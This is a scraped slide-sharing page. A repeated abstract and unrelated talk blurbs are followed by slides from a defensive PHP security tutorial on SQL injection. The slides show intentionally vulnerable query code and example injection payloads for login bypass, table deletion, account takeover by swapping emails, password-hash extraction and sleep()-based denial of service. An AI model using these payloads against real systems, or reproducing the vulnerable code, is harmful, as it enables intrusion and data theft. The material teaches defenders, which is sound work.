With more and more sites falling victim to data theft, you've probably read the list of things (not) to do to write secure code. But what else should you do to make sure your code and the rest of your web stack is secure ? In this tutorial we'll go through the basic and more advanced techniques of securing your web and database servers, securing your backend PHP code and your frontend javascript code. We'll also look at how you can build code that detects and blocks intrusion attempts and a bunch of other tips and tricks to make sure your customer data stays secure.
With more and more sites falling victim to data theft, you've probably read the list of things (not) to do to write secure code. But what else should you do to make sure your code and the rest of your web stack is secure ? In this tutorial we'll go through the basic and more advanced techniques of securing your web and database servers, securing your backend PHP code and your frontend javascript code. We'll also look at how you can build code that detects and blocks intrusion attempts and a bunch of other tips and tricks to make sure your customer data stays secure.
With more and more sites falling victim to data theft, you've probably read the list of things (not) to do to write secure code. But what else should you do to make sure your code and the rest of your web stack is secure ? In this tutorial we'll go through the basic and more advanced techniques of securing your web and database servers, securing your backend PHP code and your frontend javascript code. We'll also look at how you can build code that detects and blocks intrusion attempts and a bunch of other tips and tricks to make sure your customer data stays secure.
With more and more sites falling victim to data theft, you've probably read the list of things (not) to do to write secure code. But what else should you do to make sure your code and the rest of your web stack is secure ? In this tutorial we'll go through the basic and more advanced techniques of securing your web and database servers, securing your backend PHP code and your frontend javascript code. We'll also look at how you can build code that detects and blocks intrusion attempts and a bunch of other tips and tricks to make sure your customer data stays secure.
With more and more sites falling victim to data theft, you've probably read the list of things (not) to do to write secure code. But what else should you do to make sure your code and the rest of your web stack is secure ? In this tutorial we'll go through the basic and more advanced techniques of securing your web and database servers, securing your backend PHP code and your frontend javascript code. We'll also look at how you can build code that detects and blocks intrusion attempts and a bunch of other tips and tricks to make sure your customer data stays secure.
With more and more sites falling victim to data theft, you've probably read the list of things (not) to do to write secure code. But what else should you do to make sure your code and the rest of your web stack is secure ? In this tutorial we'll go through the basic and more advanced techniques of securing your web and database servers, securing your backend PHP code and your frontend javascript code. We'll also look at how you can build code that detects and blocks intrusion attempts and a bunch of other tips and tricks to make sure your customer data stays secure.
With more and more sites falling victim to data theft, you've probably read the list of things (not) to do to write secure code. But what else should you do to make sure your code and the rest of your web stack is secure ? In this tutorial we'll go through the basic and more advanced techniques of securing your web and database servers, securing your backend PHP code and your frontend javascript code. We'll also look at how you can build code that detects and blocks intrusion attempts and a bunch of other tips and tricks to make sure your customer data stays secure.
With more and more sites falling victim to data theft, you've probably read the list of things (not) to do to write secure code. But what else should you do to make sure your code and the rest of your web stack is secure ? In this tutorial we'll go through the basic and more advanced techniques of securing your web and database servers, securing your backend PHP code and your frontend javascript code. We'll also look at how you can build code that detects and blocks intrusion attempts and a bunch of other tips and tricks to make sure your customer data stays secure.
With more and more sites falling victim to data theft, you've probably read the list of things (not) to do to write secure code. But what else should you do to make sure your code and the rest of your web stack is secure ? In this tutorial we'll go through the basic and more advanced techniques of securing your web and database servers, securing your backend PHP code and your frontend javascript code. We'll also look at how you can build code that detects and blocks intrusion attempts and a bunch of other tips and tricks to make sure your customer data stays secure.
With more and more sites falling victim to data theft, you've probably read the list of things (not) to do to write secure code. But what else should you do to make sure your code and the rest of your web stack is secure ? In this tutorial we'll go through the basic and more advanced techniques of securing your web and database servers, securing your backend PHP code and your frontend javascript code. We'll also look at how you can build code that detects and blocks intrusion attempts and a bunch of other tips and tricks to make sure your customer data stays secure.
With more and more sites falling victim to data theft, you've probably read the list of things (not) to do to write secure code. But what else should you do to make sure your code and the rest of your web stack is secure ? In this tutorial we'll go through the basic and more advanced techniques of securing your web and database servers, securing your backend PHP code and your frontend javascript code. We'll also look at how you can build code that detects and blocks intrusion attempts and a bunch of other tips and tricks to make sure your customer data stays secure.
With more and more sites falling victim to data theft, you've probably read the list of things (not) to do to write secure code. But what else should you do to make sure your code and the rest of your web stack is secure ? In this tutorial we'll go through the basic and more advanced techniques of securing your web and database servers, securing your backend PHP code and your frontend javascript code. We'll also look at how you can build code that detects and blocks intrusion attempts and a bunch of other tips and tricks to make sure your customer data stays secure.
With more and more sites falling victim to data theft, you've probably read the list of things (not) to do to write secure code. But what else should you do to make sure your code and the rest of your web stack is secure ? In this tutorial we'll go through the basic and more advanced techniques of securing your web and database servers, securing your backend PHP code and your frontend javascript code. We'll also look at how you can build code that detects and blocks intrusion attempts and a bunch of other tips and tricks to make sure your customer data stays secure.
With more and more sites falling victim to data theft, you've probably read the list of things (not) to do to write secure code. But what else should you do to make sure your code and the rest of your web stack is secure ? In this tutorial we'll go through the basic and more advanced techniques of securing your web and database servers, securing your backend PHP code and your frontend javascript code. We'll also look at how you can build code that detects and blocks intrusion attempts and a bunch of other tips and tricks to make sure your customer data stays secure.
With more and more sites falling victim to data theft, you've probably read the list of things (not) to do to write secure code. But what else should you do to make sure your code and the rest of your web stack is secure ? In this tutorial we'll go through the basic and more advanced techniques of securing your web and database servers, securing your backend PHP code and your frontend javascript code. We'll also look at how you can build code that detects and blocks intrusion attempts and a bunch of other tips and tricks to make sure your customer data stays secure.
With more and more sites falling victim to data theft, you've probably read the list of things (not) to do to write secure code. But what else should you do to make sure your code and the rest of your web stack is secure ? In this tutorial we'll go through the basic and more advanced techniques of securing your web and database servers, securing your backend PHP code and your frontend javascript code. We'll also look at how you can build code that detects and blocks intrusion attempts and a bunch of other tips and tricks to make sure your customer data stays secure.
With more and more sites falling victim to data theft, you've probably read the list of things (not) to do to write secure code. But what else should you do to make sure your code and the rest of your web stack is secure ? In this tutorial we'll go through the basic and more advanced techniques of securing your web and database servers, securing your backend PHP code and your frontend javascript code. We'll also look at how you can build code that detects and blocks intrusion attempts and a bunch of other tips and tricks to make sure your customer data stays secure.
When dynamic becomes static: the next step in web caching techniquesWim Godden
Although tools like Varnish can improve performance and scalability for static sites, when user-specific content is needed, a hit to the PHP/Ruby/Python/.Net backend is still required, causing scalability issues. We’ll look at a brand-new Nginx module which implements an ultra-fast and scalable solution to this problem, changing the way developers think about designing sites with user-specific content.
With more and more sites falling victim to data theft, you've probably read the list of things (not) to do to write secure code. But what else should you do to make sure your code and the rest of your web stack is secure ? In this tutorial we'll go through the basic and more advanced techniques of securing your web and database servers, securing your backend PHP code and your frontend javascript code. We'll also look at how you can build code that detects and blocks intrusion attempts and a bunch of other tips and tricks to make sure your customer data stays secure.
From ReactPHP to Facebook Hack's Async implementation and many more, asynchronous programming has been a 'hot' topic lately. But how well does async programming support work in PHP and what can you actually use it for in your projects ? Let's look at some real-world use cases and how they leverage the power of async to do things you didn't know PHP could do.
Natural Task Scheduling Using Futures and Continuations, Ivan Čukić, Qt Devel...Ivan Čukić
We are used to think about algorithms in a procedural manner – with loops, branches and subroutines. Presenting an algorithm as an easily understandable flow between its steps.
In the real world, where we need to reduce latency and forbid the blocking API calls, these flows get broken. Due to the inversion of control (IoC) required by the introduction of asynchronous APIs (Xlib vs. XCB, iostream vs. boost::asio), the code becomes an unreadable call-callback soup.
We are presenting a way of defining the algorithm flow in a procedural manner and leaving it up to the C++ compiler to generate the necessary asynchronous code.
Building a Pyramid: Symfony Testing StrategiesCiaranMcNulty
The last few years have seen a huge adoption of testing practices, and an explosion of different testing tools, in the PHP space. The difficulties come when we have to choose which tools to use, in what combinations, and how to apply them to existing codebases.
In this talk we will look at what tools are available, what their strengths are, how to decide which set of tools to use for new or legacy projects, and when to prioritise decoupling and testability over the convenience we get from our frameworks.
There are so many interesting ways to authenticate a user: via an API token, social login, a traditional HTML form or anything else you can dream up. But until now, creating a custom authentication system in Symfony has meant a lot of files and a lot of complexity. Introducing Guard: a simple, but expandable authentication system built on top of the security component and introduced in Symfony 2.8. Want to authenticate via an API token? Great - that's just one class. Social login? Easy! Have some crazy legacy central authentication system? In this talk, we'll show you how you'd implement any of these in your application today. Don't get me wrong - you'll still need to do some work. But finally, the path will be clear and joyful.
Software development is riddled with explicit and implicit costs. Every decision you make has a cost attached to it. When you're writing code, you're making an investment, the size of which will for a long time define the costs of your future growth. In this talk you will learn how to see, understand and game some of these forces in your favour.
Beyond PHP - it's not (just) about the codeWim Godden
Most PHP developers focus on writing code. But creating Web applications is about much more than just writing PHP. Take a step outside the PHP cocoon and into the big PHP ecosphere to find out how small code changes can make a world of difference on servers and network. This talk is an eye-opener for developers who spend over 80% of their time coding, debugging and testing.
In 2010, I told everyone how to start unit testing Zend Framework applications. In 2011, let’s take this a step further by testing services, work flows and performance. Looking to raise the bar on quality? Let this talk be the push you need to improve your Zend Framework projects.
With more and more sites falling victim to data theft, you've probably read the list of things (not) to do to write secure code. But what else should you do to make sure your code and the rest of your web stack is secure ? In this tutorial we'll go through the basic and more advanced techniques of securing your web and database servers, securing your backend PHP code and your frontend javascript code. We'll also look at how you can build code that detects and blocks intrusion attempts and a bunch of other tips and tricks to make sure your customer data stays secure.
When dynamic becomes static: the next step in web caching techniquesWim Godden
Although tools like Varnish can improve performance and scalability for static sites, when user-specific content is needed, a hit to the PHP/Ruby/Python/.Net backend is still required, causing scalability issues. We’ll look at a brand-new Nginx module which implements an ultra-fast and scalable solution to this problem, changing the way developers think about designing sites with user-specific content.
With more and more sites falling victim to data theft, you've probably read the list of things (not) to do to write secure code. But what else should you do to make sure your code and the rest of your web stack is secure ? In this tutorial we'll go through the basic and more advanced techniques of securing your web and database servers, securing your backend PHP code and your frontend javascript code. We'll also look at how you can build code that detects and blocks intrusion attempts and a bunch of other tips and tricks to make sure your customer data stays secure.
From ReactPHP to Facebook Hack's Async implementation and many more, asynchronous programming has been a 'hot' topic lately. But how well does async programming support work in PHP and what can you actually use it for in your projects ? Let's look at some real-world use cases and how they leverage the power of async to do things you didn't know PHP could do.
Natural Task Scheduling Using Futures and Continuations, Ivan Čukić, Qt Devel...Ivan Čukić
We are used to think about algorithms in a procedural manner – with loops, branches and subroutines. Presenting an algorithm as an easily understandable flow between its steps.
In the real world, where we need to reduce latency and forbid the blocking API calls, these flows get broken. Due to the inversion of control (IoC) required by the introduction of asynchronous APIs (Xlib vs. XCB, iostream vs. boost::asio), the code becomes an unreadable call-callback soup.
We are presenting a way of defining the algorithm flow in a procedural manner and leaving it up to the C++ compiler to generate the necessary asynchronous code.
Building a Pyramid: Symfony Testing StrategiesCiaranMcNulty
The last few years have seen a huge adoption of testing practices, and an explosion of different testing tools, in the PHP space. The difficulties come when we have to choose which tools to use, in what combinations, and how to apply them to existing codebases.
In this talk we will look at what tools are available, what their strengths are, how to decide which set of tools to use for new or legacy projects, and when to prioritise decoupling and testability over the convenience we get from our frameworks.
There are so many interesting ways to authenticate a user: via an API token, social login, a traditional HTML form or anything else you can dream up. But until now, creating a custom authentication system in Symfony has meant a lot of files and a lot of complexity. Introducing Guard: a simple, but expandable authentication system built on top of the security component and introduced in Symfony 2.8. Want to authenticate via an API token? Great - that's just one class. Social login? Easy! Have some crazy legacy central authentication system? In this talk, we'll show you how you'd implement any of these in your application today. Don't get me wrong - you'll still need to do some work. But finally, the path will be clear and joyful.
Software development is riddled with explicit and implicit costs. Every decision you make has a cost attached to it. When you're writing code, you're making an investment, the size of which will for a long time define the costs of your future growth. In this talk you will learn how to see, understand and game some of these forces in your favour.
Beyond PHP - it's not (just) about the codeWim Godden
Most PHP developers focus on writing code. But creating Web applications is about much more than just writing PHP. Take a step outside the PHP cocoon and into the big PHP ecosphere to find out how small code changes can make a world of difference on servers and network. This talk is an eye-opener for developers who spend over 80% of their time coding, debugging and testing.
In 2010, I told everyone how to start unit testing Zend Framework applications. In 2011, let’s take this a step further by testing services, work flows and performance. Looking to raise the bar on quality? Let this talk be the push you need to improve your Zend Framework projects.
With more and more sites falling victim to data theft, you've probably read the list of things (not) to do to write secure code. But what else should you do to make sure your code and the rest of your web stack is secure ? In this tutorial we'll go through the basic and more advanced techniques of securing your web and database servers, securing your backend PHP code and your frontend javascript code. We'll also look at how you can build code that detects and blocks intrusion attempts and a bunch of other tips and tricks to make sure your customer data stays secure.
Mugdha and Amish from OSSCube present on Php security at OSSCamp, organized by OSSCube - A Global open Source enterprise for Open Source Solutions
To know how we can help your business grow, leveraging Open Source, contact us:
India: +91 995 809 0987
USA: +1 919 791 5427
WEB: www.osscube.com
Mail: sales@osscube.com
Building Modern and Secure PHP Applications – Codementor Office Hours with Be...Arc & Codementor
Codementor PHP expert mentor Ben Edmunds is the co-host of PHP Town Hall and author of Building Secure PHP Apps.
Ben is also the creator of Ion Auth, a simple, lightweight authentication library for CodeIgniter.
In an interactive format, Ben talked about:
Modern PHP
Latest PHP tools
SQL Injection
Password Hashing and Authentication
Other Common Hacks
https://www.codementor.io/benedmunds
https://www.codementor.io/php-tutorial/building-modern-secure-php-applications-codementor-office-hours-ben-edmunds
Using php as a server-side scripting language, I have created a simple user authentication module. The module can be directly implemented in a website with some minor changes to provide user signup ability in a webpage. HTML and CSS have been used for the designing of the webpage, and MySQL for backend database management.
SQL Injection in action with PHP and MySQLPradeep Kumar
A hands-on example for SQL injection using PHP and MySQL
It also offers an overview how it gets into in our applications and how we can overcome SQL Injection.
Beyond php - it's not (just) about the codeWim Godden
Most PHP developers focus on writing code. But creating Web applications is about much more than just wrting PHP. Take a step outside the PHP cocoon and into the big PHP ecosphere to find out how small code changes can make a world of difference on servers and network. This talk is an eye-opener for developers who spend over 80% of their time coding, debugging and testing.
Who would have thought putting 140 charachter messages about one's life online or having a virtual farm game could ever be popular ? Then again, many of us have those weird (but sometimes brilliant) ideas.
But no matter how incredible your ideas might be, getting them launched successfully takes more than writing lots of php code, smacking a sleek design on it and dropping it on a server.
So what does it take ? Where do most ideas crashland and how can you avoid making the same mistakes and transform your ideas into reality ? We'll look at what steps are needed to make a service successful and sustainable.
With PHP 8.0 recently released and PHP 5.x still accounting for over 40% of all production environments, it's time to paint a clear picture on not just why everyone should move to 8.x, but on how to get code ready for the latest version of PHP. In this talk, we'll look at some handy tools and techniques to ease the migration.
With PHP 7.2 recently released and PHP 5.3 and 5.4 still accounting for over 40% of all production environments, it's time to paint a clear picture on not just why everyone should move to 7.0 (or preferably 7.1), but on how to get code ready for the latest version of PHP.
Using the version compatibility checker for PHP_CodeSniffer and a few simple step-by-step instructions, upgrading old code to make it compatible with the latest PHP versions becomes actually really easy. In this talk, we'll migrate an old piece of code and get rid of the demons of the past and ready for the present and future.
The time of static or dynamically generated sites is long gone. Non-stop interaction with users is the new normal. However, polling with Ajax requests is processor intensive and cumbersome. Websockets allow you to interact with users in real-time without increasing system load. We'll go through the basics and see all the different options, illustrated with live examples of how and when to use it, as well as when not to use it.
Who would have thought putting 140 charachter messages about one's life online or having a virtual farm game could ever be popular ? Then again, many of us have those weird (but sometimes brilliant) ideas.
But no matter how incredible your ideas might be, getting them launched successfully takes more than writing lots of php code, smacking a sleek design on it and dropping it on a server.
So what does it take ? Where do most ideas crashland and how can you avoid making the same mistakes and transform your ideas into reality ? We'll look at what steps are needed to make a service successful and sustainable.
Your app lives on the network - networking for web developersWim Godden
Our job might be to build web applications, but we can't build apps that rely on networking if we don't know how these networks and the big network that connects them all (this thing called the Internet) actually work.
I'll walk through the basics of networking, then dive a lot deeper (from TCP/UDP to IPv4/6, source/destination ports, sockets, DNS and even BGP).
Prepare for an eye-opener when you realize how much a typical app relies on all of these (and many more) working flawlessly... and how you can prepare your app for failure in the chain.
With PHP 7.2 recently released and PHP 5.3 and 5.4 still accounting for over 40% of all production environments, it's time to paint a clear picture on not just why everyone should move to 7.0 (or preferably 7.1), but on how to get code ready for the latest version of PHP.
Using the version compatibility checker for PHP_CodeSniffer and a few simple step-by-step instructions, upgrading old code to make it compatible with the latest PHP versions becomes actually really easy. In this talk, we'll migrate an old piece of code and get rid of the demons of the past and ready for the present and future.
With PHP 7.2 recently released and PHP 5.3 and 5.4 still accounting for over 40% of all production environments, it's time to paint a clear picture on not just why everyone should move to 7.0 (or preferably 7.1), but on how to get code ready for the latest version of PHP.
Using the version compatibility checker for PHP_CodeSniffer and a few simple step-by-step instructions, upgrading old code to make it compatible with the latest PHP versions becomes actually really easy. In this talk, we'll migrate an old piece of code and get rid of the demons of the past and ready for the present and future.
Beyond php - it's not (just) about the codeWim Godden
Most PHP developers focus on writing code. But creating Web applications is about much more than just wrting PHP. Take a step outside the PHP cocoon and into the big PHP ecosphere to find out how small code changes can make a world of difference on servers and network. This talk is an eye-opener for developers who spend over 80% of their time coding, debugging and testing.
The time of static or dynamically generated sites is long gone. Non-stop interaction with users is the new normal. However, polling with Ajax requests is processor intensive and cumbersome. Websockets allow you to interact with users in real-time without increasing system load. We'll go through the basics and see all the different options, illustrated with live examples of how and when to use it.
Your app lives on the network - networking for web developersWim Godden
Our job might be to build web applications, but we can't build apps that rely on networking if we don't know how these networks and the big network that connects them all (this thing called the Internet) actually work.
I'll walk through the basics of networking, then dive a lot deeper (from TCP/UDP to IPv4/6, source/destination ports, sockets, DNS and even BGP).
Prepare for an eye-opener when you realize how much a typical app relies on all of these (and many more) working flawlessly... and how you can prepare your app for failure in the chain.
A practical step-by-step guide to Git, taking you through each phase of a project and explaining the use of Git at each step of the development process. Expect lots of how-to, but also some how-not-to, to avoid going down the wrong path.
Beyond php - it's not (just) about the codeWim Godden
Most PHP developers focus on writing code. But creating Web applications is about much more than just wrting PHP. Take a step outside the PHP cocoon and into the big PHP ecosphere to find out how small code changes can make a world of difference on servers and network. This talk is an eye-opener for developers who spend over 80% of their time coding, debugging and testing.
From ReactPHP to Facebook Hack's Async implementation and many more, asynchronous programming has been a 'hot' topic lately. But how well does async programming support work in PHP and what can you actually use it for in your projects ? Let's look at some real-world use cases and how they leverage the power of async to do things you didn't know PHP could do.
Although tools like Varnish can improve performance and scalability for static sites, when user-specific content is needed, a hit to the PHP/Ruby/Python/.Net backend is still required, causing scalability issues. We’ll look at a brand-new Nginx module which implements an ultra-fast and scalable solution to this problem, changing the way developers think about designing sites with user-specific content.
From ReactPHP to Facebook Hack's Async implementation and many more, asynchronous programming has been a 'hot' topic lately. But how well does async programming support work in PHP and what can you actually use it for in your projects ? Let's look at some real-world use cases and how they leverage the power of async to do things you didn't know PHP could do.
Although tools like Varnish can improve performance and scalability for static sites, when user-specific content is needed, a hit to the PHP/Ruby/Python/.Net backend is still required, causing scalability issues. We’ll look at a brand-new Nginx module which implements an ultra-fast and scalable solution to this problem, changing the way developers think about designing sites with user-specific content.
UiPath Test Automation using UiPath Test Suite series, part 3DianaGray10
Welcome to UiPath Test Automation using UiPath Test Suite series part 3. In this session, we will cover desktop automation along with UI automation.
Topics covered:
UI automation Introduction,
UI automation Sample
Desktop automation flow
Pradeep Chinnala, Senior Consultant Automation Developer @WonderBotz and UiPath MVP
Deepak Rai, Automation Practice Lead, Boundaryless Group and UiPath MVP
Kubernetes & AI - Beauty and the Beast !?! @KCD Istanbul 2024Tobias Schneck
As AI technology is pushing into IT I was wondering myself, as an “infrastructure container kubernetes guy”, how get this fancy AI technology get managed from an infrastructure operational view? Is it possible to apply our lovely cloud native principals as well? What benefit’s both technologies could bring to each other?
Let me take this questions and provide you a short journey through existing deployment models and use cases for AI software. On practical examples, we discuss what cloud/on-premise strategy we may need for applying it to our own infrastructure to get it to work from an enterprise perspective. I want to give an overview about infrastructure requirements and technologies, what could be beneficial or limiting your AI use cases in an enterprise environment. An interactive Demo will give you some insides, what approaches I got already working for real.
Generating a custom Ruby SDK for your web service or Rails API using Smithyg2nightmarescribd
Have you ever wanted a Ruby client API to communicate with your web service? Smithy is a protocol-agnostic language for defining services and SDKs. Smithy Ruby is an implementation of Smithy that generates a Ruby SDK using a Smithy model. In this talk, we will explore Smithy and Smithy Ruby to learn how to generate custom feature-rich SDKs that can communicate with any web service, such as a Rails JSON API.
Connector Corner: Automate dynamic content and events by pushing a buttonDianaGray10
Here is something new! In our next Connector Corner webinar, we will demonstrate how you can use a single workflow to:
Create a campaign using Mailchimp with merge tags/fields
Send an interactive Slack channel message (using buttons)
Have the message received by managers and peers along with a test email for review
But there’s more:
In a second workflow supporting the same use case, you’ll see:
Your campaign sent to target colleagues for approval
If the “Approve” button is clicked, a Jira/Zendesk ticket is created for the marketing design team
But—if the “Reject” button is pushed, colleagues will be alerted via Slack message
Join us to learn more about this new, human-in-the-loop capability, brought to you by Integration Service connectors.
And...
Speakers:
Akshay Agnihotri, Product Manager
Charlie Greenberg, Host
DevOps and Testing slides at DASA ConnectKari Kakkonen
My and Rik Marselis slides at 30.5.2024 DASA Connect conference. We discuss about what is testing, then what is agile testing and finally what is Testing in DevOps. Finally we had lovely workshop with the participants trying to find out different ways to think about quality and testing in different parts of the DevOps infinity loop.
State of ICS and IoT Cyber Threat Landscape Report 2024 previewPrayukth K V
The IoT and OT threat landscape report has been prepared by the Threat Research Team at Sectrio using data from Sectrio, cyber threat intelligence farming facilities spread across over 85 cities around the world. In addition, Sectrio also runs AI-based advanced threat and payload engagement facilities that serve as sinks to attract and engage sophisticated threat actors, and newer malware including new variants and latent threats that are at an earlier stage of development.
The latest edition of the OT/ICS and IoT security Threat Landscape Report 2024 also covers:
State of global ICS asset and network exposure
Sectoral targets and attacks as well as the cost of ransom
Global APT activity, AI usage, actor and tactic profiles, and implications
Rise in volumes of AI-powered cyberattacks
Major cyber events in 2024
Malware and malicious payload trends
Cyberattack types and targets
Vulnerability exploit attempts on CVEs
Attacks on counties – USA
Expansion of bot farms – how, where, and why
In-depth analysis of the cyber threat landscape across North America, South America, Europe, APAC, and the Middle East
Why are attacks on smart factories rising?
Cyber risk predictions
Axis of attacks – Europe
Systemic attacks in the Middle East
Download the full report from here:
https://sectrio.com/resources/ot-threat-landscape-reports/sectrio-releases-ot-ics-and-iot-security-threat-landscape-report-2024/
GraphRAG is All You need? LLM & Knowledge GraphGuy Korland
Guy Korland, CEO and Co-founder of FalkorDB, will review two articles on the integration of language models with knowledge graphs.
1. Unifying Large Language Models and Knowledge Graphs: A Roadmap.
https://arxiv.org/abs/2306.08302
2. Microsoft Research's GraphRAG paper and a review paper on various uses of knowledge graphs:
https://www.microsoft.com/en-us/research/blog/graphrag-unlocking-llm-discovery-on-narrative-private-data/
UiPath Test Automation using UiPath Test Suite series, part 4DianaGray10
Welcome to UiPath Test Automation using UiPath Test Suite series part 4. In this session, we will cover Test Manager overview along with SAP heatmap.
The UiPath Test Manager overview with SAP heatmap webinar offers a concise yet comprehensive exploration of the role of a Test Manager within SAP environments, coupled with the utilization of heatmaps for effective testing strategies.
Participants will gain insights into the responsibilities, challenges, and best practices associated with test management in SAP projects. Additionally, the webinar delves into the significance of heatmaps as a visual aid for identifying testing priorities, areas of risk, and resource allocation within SAP landscapes. Through this session, attendees can expect to enhance their understanding of test management principles while learning practical approaches to optimize testing processes in SAP environments using heatmap visualization techniques
What will you get from this session?
1. Insights into SAP testing best practices
2. Heatmap utilization for testing
3. Optimization of testing processes
4. Demo
Topics covered:
Execution from the test manager
Orchestrator execution result
Defect reporting
SAP heatmap example with demo
Speaker:
Deepak Rai, Automation Practice Lead, Boundaryless Group and UiPath MVP
Transcript: Selling digital books in 2024: Insights from industry leaders - T...BookNet Canada
The publishing industry has been selling digital audiobooks and ebooks for over a decade and has found its groove. What’s changed? What has stayed the same? Where do we go from here? Join a group of leading sales peers from across the industry for a conversation about the lessons learned since the popularization of digital books, best practices, digital book supply chain management, and more.
Link to video recording: https://bnctechforum.ca/sessions/selling-digital-books-in-2024-insights-from-industry-leaders/
Presented by BookNet Canada on May 28, 2024, with support from the Department of Canadian Heritage.
Elevating Tactical DDD Patterns Through Object CalisthenicsDorra BARTAGUIZ
After immersing yourself in the blue book and its red counterpart, attending DDD-focused conferences, and applying tactical patterns, you're left with a crucial question: How do I ensure my design is effective? Tactical patterns within Domain-Driven Design (DDD) serve as guiding principles for creating clear and manageable domain models. However, achieving success with these patterns requires additional guidance. Interestingly, we've observed that a set of constraints initially designed for training purposes remarkably aligns with effective pattern implementation, offering a more ‘mechanical’ approach. Let's explore together how Object Calisthenics can elevate the design of your tactical DDD patterns, offering concrete help for those venturing into DDD for the first time!
12. Who am I ?
Wim Godden (@wimgtr)
Founder of Cu.be Solutions (http://cu.be)
Open Source developer since 1997
Developer of PHPCompatibility, OpenX, ...
Speaker at PHP and Open Source conferences
13. Who are you ?
Developers ?
System engineers ?
Network engineers ?
Ever had a hack ?
Through the code ?
Through the server ?
14. This tutorial
Based on 2-day training
Full stack → no Vagrant/VirtualBox required
Code samples will be provided after tutorial
Lots of links at the end → slides on Joind.in
15. My app is secure... I think
Basic stuff = known...
… or is it ?
Code is not enough
Code
Webserver
Database server
Operating system
Network
16. Disclaimer
Do not use these techniques to hack
Use the knowledge to prevent others from hacking you
17. Reasons for hackers to hack
Steal and sell your data
Use your infrastructure as a jumpstation to hack other servers
Send out lots of spam
Use your server in a botnet for DDOS attacks
Bring down your systems
…
21. SQL Injection (OWASP #1)
<?
require("header.php");
$hostname="localhost";
$sqlusername="someuser";
$sqlpassword="somepass";
$dbName="somedb";
MYSQL_CONNECT($hostname,$sqlusername,$sqlpassword) OR DIE("Unable to connect to database.");
@mysql_select_db("$dbName") or die("Unable to select database.");
$fp=fopen("content/whatever.php","r");
while (!feof($fp))
$content.=fgets($fp,2);
$res=MYSQL_DB_QUERY("somedb","select * from whatever where id=" . $_GET['id']);
for ($cnt=0;$cnt<MYSQL_NUMROWS($res);$cnt++)
{
$lst.="<LI>".MYSQL_RESULT($res,$cnt,"text")."</LI>n";
}
$content=str_replace("<@textstring@>",$lst,$content);
print $content;
require("footer.php");
?>
22. SQL Injection (OWASP #1)
Over 15 years
Still #1 problem
Easy to exploit
Easy to automate (scan + exploit)
Often misunderstood
23. Standard SQL injection example
<?php
$query = "select * from user where email='" . $_POST['email'] . "'";
$result = mysql_query($query);
if (mysql_errno() != 0) {
echo 'All is good';
} else {
echo 'Nobody home';
}
' OR '1'='1
select * from user where email='' OR '1'='1'
E-mail :
24. Standard SQL injection example
<?php
$query = "select * from user where email='" . $_POST['email'] . "'";
$result = mysql_query($query);
if (mysql_errno() != 0) {
echo 'All is good';
} else {
echo 'Nobody home';
}
' OR '1'='1
select * from user where '1'='1'
E-mail :
25. Standard SQL injection example
<?php
$query = "select * from user where email='" . $_POST['email'] . "'";
$result = mysql_query($query);
if (mysql_errno() != 0) {
echo 'All is good';
} else {
echo 'Nobody home';
}
' OR '1'='1
select * from user;
E-mail :
26. Typical pre-2005 site
Your mission (impossible) : secure the site !
index.php
contact.php
register.php
login.php
Once logged in :
main.php
… (all other content)
27. SQL injection – sample – lostpassword.php
<?php
$query = "select * from user where email='" . $_POST['email'] . "'";
$result = mysql_query($query);
if (mysql_errno() != 0) {
echo 'Error !';
} else {
if (mysql_numrows($result) == 0) {
echo 'E-mail address not found';
} else {
$newpass = updatepassword(mysql_result($result, 0, 'email'));
mail($_POST['email'], 'New password', 'New password: ' . $newpass);
echo 'New password sent to ' . mysql_result($result, 0, 'email');
}
}
28. SQL injection – sample – lostpassword
lostpassword.php?email=whatever@me.com%27+OR+%271%27%3D%271
email=whatever@me.com' OR '1'='1
select * from user where email='whatever@me.com' OR '1'='1'
29. Worst case : data deletion
email=whatever@me.com' OR '1'='1'; delete from user where '1'='1
30. Knowing the table structure
email=whatever@me.com' AND email is NULL; --'
select * from user where email='whatever@me.com' AND email is NULL; --';
<?php
$query = "select * from user where email='" . $_GET['email'] . "'";
$result = mysql_query($query);
if (mysql_errno() != 0) {
echo 'Error !';
} else {
if (mysql_numrows($result) == 0) {
echo 'Not found';
} else {
$newpass = updatepassword(mysql_result($result, 0, 'email'));
mail($_GET['email'], 'New password', 'Your new password is ' . $newpass);
echo 'Your new password was sent to ' . mysql_result($result, 0, 'email');
}
}
32. Update, retrieve password, update again
email=whatever@me.com'; UPDATE user set
email='myhackeraddress@gmail.com' where email='some-user-
we@found.com'; --';
Retrieve password for myhackeraddress@gmail.com
email=whatever@me.com'; UPDATE user set email='some-user-
we@found.com' where email='myhackeraddress@gmail.com'; --';
33. Hackers just want your data
email=whatever@me.com' OR 1=1 limit 1, 1; --';
email=whatever@me.com' OR 1=1 limit 2, 1; --';
email=whatever@me.com' OR 1=1 limit 3, 1; --';
...
34. They want ALL data (not just email addresses)
Field name Type
id int
username varchar(32)
password varchar(64)
firstname varchar(32)
lastname varchar(32)
address varchar(255)
zip varchar(8)
city varchar(32)
country varchar(3)
... ...
35. They want ALL data (not just email addresses)
Field name Contents
password hoh8asfdgih$0h3oh#hflkdsafhfsdfdsaf
address Hollywood Blvd. 32
36. They want ALL data (not just email addresses)
Field name Contents
password hoh8asfdgih$0h3oh#hflkdsafhfsdfdsaf
address Hollywood Blvd. 32|||hoh8asfdgih$0h3oh#hflkdsafhfsdfdsaf
37. They want ALL data (not just email addresses)
email=whatever@me.com'; UPDATE user set address=concat(address, '|||',
password), email='myhackeraddress@gmail.com' where email='some-user-
we@found.com'; --';
Retrieve password for myhackeraddress@gmail.com
Start scraping !
email=whatever@me.com'; UPDATE user set
password=substring_index(address, '|||', -1),
address=substring_index(address, '|||', 1), email='some-user-
we@found.com' where email='myhackeraddress@gmail.com'; --';
38. SQL Injection – much more...
Much more than logging in as a user
SQL injection possible → wide range of dangers
39. Fixing SQL injection : attempt #1
Addslashes() ?
$query = mysql_query('select * from user where id=' . addslashes($_GET['id']));
www.hack.me/id=5%20and%20sleep(10)
select * from user where id=5 and sleep(10)
What if we hit that code 100 times simultaneously ?
MySQL max_connections reached → Server unavailable
43. Other injections
LDAP injection
Command injection (system, exec, …)
→ Use escapeshellarg() for the arguments
Eval (waaaaaaaaaah !)
…
User input → PHP → External system
If you provide the data, it's your responsibility !
If you consume the data, it's your responsibility !
44. Demo
<?php
mysql_connect('localhost', 'sqlinjection', 'password') or die('Not working');
mysql_select_db('sqlinjection');
$result = mysql_query("select * from user where email='" . $_GET['email'] . "'");
if (mysql_numrows($result) > 0) {
echo mysql_result($result, 0, 'name');
} else {
echo 'Error';
}
49. Ways to avoid session fixation/hijacking
session.use_trans_sid = 0
session.use_only_cookies = true
session.cookie_httponly = true
